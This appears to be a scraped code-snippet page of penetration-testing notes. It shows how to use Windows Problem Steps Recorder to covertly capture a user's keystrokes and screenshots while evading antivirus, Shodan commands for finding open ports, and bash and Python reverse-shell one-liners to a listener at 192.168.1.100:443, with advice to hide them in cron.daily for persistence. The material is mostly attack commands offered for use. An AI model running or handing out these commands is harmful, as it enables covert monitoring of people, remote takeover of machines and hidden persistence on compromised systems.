This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows workstations have a built-in utility called Problem Steps Recorder that can be used covertly by penetration testers to record keystrokes and screenshots of user activity. There is no risk of AV flagging this since it is a signed Microsoft binary. | |
To start logging the user's activity: | |
psr.exe /start /gui 0 /output C:\Users\user\AppData\Local\log.zip | |
To stop logging: | |
psr.exe /stop | |
Once the process is stopped, the zip file will be created. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Setting Up | |
sudo pip install shodan # Install shodan | |
shodan init API_KEY # Initialise it with your API key | |
Searching Existing Database | |
shodan search "net:212.159.101.101/24 port:22" # Search specific IP range for a specific port | |
shodan search "nginx port:5011" # Search for banner text on specific open port |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
All reverse shells assume a standard netcat listener on TCP port 443 of 192.168.1.100 (nc -nvlp 443) ready to catch the shell. Modify as needed. | |
Add one of these to one of the existing scripts in /etc/cron.daily to get persistence on a compromised Linux box. | |
# Shell script | |
sh -i >& /dev/tcp/192.168.1.100/443 0>&1 | |
# Python | |
python -c 'import os,pty,sys,socket; sock=socket.socket(); sock.connect(("192.168.1.100",443)); [os.dup2(sock.fileno(),f) for f in (0,1,2)]; pty.spawn("/bin/sh")' |